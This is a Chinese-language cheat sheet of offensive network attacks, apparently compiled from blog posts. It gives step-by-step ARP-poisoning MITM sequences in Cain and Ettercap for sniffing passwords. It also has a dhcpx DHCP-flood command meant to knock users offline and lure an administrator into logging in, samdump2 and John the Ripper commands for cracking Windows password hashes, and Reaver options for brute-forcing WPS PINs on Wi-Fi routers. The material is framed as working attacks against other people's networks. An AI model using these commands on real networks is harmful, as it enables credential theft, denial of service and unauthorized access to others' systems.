http://blog.csdn.net/nivana999/article/details/5272699

底层使用了wincap,该驱动只能使用有线网卡上使用.

  • [Tools] - Base64 Password Decode
  • MITM攻击: Sniffer - ARP –> ‘+’ 左侧选择网关,右侧选择被攻击者,OK –> Start APR
Ettercap  # profling password
ettercap -G  # 以GUI方式运行etttercap
[Sniff] - Unified sniffing --> select the network interface
[Host]  - Scan for hosts
[Start] - Start sniffing
[Mitm]  - Arp poising --> Sniff remote connections
[Start] - Stop sniffing + [Mitm] - Stop mitm attacks

dhcpx

虚假发送大量DHCP请求,迫使路由瘫痪,大量用户掉线,管理员可能会登陆路由管理界面.

dhcpx -i wlan0 -D 192.168.1.100 -t 8000  # -t:每分钟发送频率,-D:路由地址,-i:当前连接的无线网卡

John The Ripper

windows,linux密码破解,compile: cd src –> make –> make clean generic

samdump2 -o hash.txt SYSTEM SAM
john --show hash.txt

miniwep

信号绝对值越小,信号越强! 信号列表中每一行的最后以_wps为后缀的说明开启了wps功能!

加密方式后面有MAC地址的说明当前信号有客户连接上,可以进行破解!

wps-pin破解需要点击Reaver,若bencons数值一直没有增长,可放弃该信号.

http://blog.sina.com.cn/s/blog_73b9fe3501017oqt.html

# -i: 通常是mon0. -b:AP的MAC地址 -m:指定本机的MAC,AP有MAC过滤时使用
# -e: ESSID,一般不用指定. -c:频道,一般不用指定,会自动扫描
# -a: 自动检测目标AP的最先进选项,推荐.
# -n: 对目标AP总是发送NACK,默认自动.
# -r: 每100个pin睡眠10秒
# -l: AP锁住pin破解时延迟秒数,default:60
# -d: pin之间的延迟seconds,default:1
# -S: 使用小的DHkey,可提高破解速度
# -s: 恢复以前的进度文件,不指定任何文件则使用最近一次使用的那个文件.
# -t: 接收超时秒数,default:5
reaver options: -a -v -n -r 100:10 -l 60 -d .5(信号普通0.5s) -p 1234(知道了前四位PIN码)

wpc文件,保存进度 /usr/local/etc/reaver/mac.wpc(1.3:/etc/reaver/mac.wpc)

0  # 4位PIN码的进度,很重要.可以手动修改以保存进度,如从3000开始修改为3004
0  # 这个地方是说后3位PIN数的已经运行测试位置数
0  # 0,没有找到 1,找到前四位 2,全部找到。
# 第4行起:1万个前四位数 + 1千个三位数